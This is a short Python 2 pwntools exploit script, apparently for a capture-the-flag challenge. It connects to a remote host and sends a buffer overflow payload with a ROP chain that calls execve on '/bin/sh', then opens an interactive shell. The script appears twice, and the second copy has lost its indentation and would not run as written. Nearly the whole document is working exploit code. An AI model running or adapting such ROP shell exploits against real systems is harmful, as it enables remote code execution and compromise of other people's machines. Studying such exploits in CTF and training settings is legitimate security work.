aagallag/babys_first_rop_pwner.py

## babys_first_rop_pwner.py
#!/usr/bin/env python2
from pwn import *

REMOTE = True
DBG = False
FNAME = './cracked_chall_binary'
HOST = '172.31.2.62'
PORT = '47802'

GADGETS_BASE    = 0x601080
GADGET_POP_EAX  = GADGETS_BASE + 0x7609#:    58                      pop    %eax
GADGET_POP_ESI  = GADGETS_BASE + 0x761b#:    5e                      pop    %esi
GADGET_POP_EDX  = GADGETS_BASE + 0x760f#:    5a                      pop    %edx
GADGET_SYSCALL  = GADGETS_BASE + 0x2d0f#:    0f 05                   syscall


def getp():
    if REMOTE:
        p = remote(HOST, PORT)
    elif DBG:
        p = process(['linux_serverx64', '-p4200', FNAME])
    else:
        p = process([FNAME])
    return p

p = getp()

payload = ''
payload += '/bin/sh\x00'
payload += p64(0x00)
payload += 'A'*(88-len(payload))
payload += p64(GADGET_POP_EAX)
payload += p64(59)
payload += p64(GADGET_POP_ESI)
payload += p64(0x631088)
payload += p64(GADGET_POP_EDX)
payload += p64(0x631088)
payload += p64(GADGET_SYSCALL)

p.sendline(payload)

p.interactive()
	#!/usr/bin/env python2
	from pwn import *

	REMOTE = True
	DBG = False
	FNAME = './cracked_chall_binary'
	HOST = '172.31.2.62'
	PORT = '47802'

	GADGETS_BASE = 0x601080
	GADGET_POP_EAX = GADGETS_BASE + 0x7609#: 58 pop %eax
	GADGET_POP_ESI = GADGETS_BASE + 0x761b#: 5e pop %esi
	GADGET_POP_EDX = GADGETS_BASE + 0x760f#: 5a pop %edx
	GADGET_SYSCALL = GADGETS_BASE + 0x2d0f#: 0f 05 syscall


	def getp():
	if REMOTE:
	p = remote(HOST, PORT)
	elif DBG:
	p = process(['linux_serverx64', '-p4200', FNAME])
	else:
	p = process([FNAME])
	return p

	p = getp()

	payload = ''
	payload += '/bin/sh\x00'
	payload += p64(0x00)
	payload += 'A'*(88-len(payload))
	payload += p64(GADGET_POP_EAX)
	payload += p64(59)
	payload += p64(GADGET_POP_ESI)
	payload += p64(0x631088)
	payload += p64(GADGET_POP_EDX)
	payload += p64(0x631088)
	payload += p64(GADGET_SYSCALL)

	p.sendline(payload)

	p.interactive()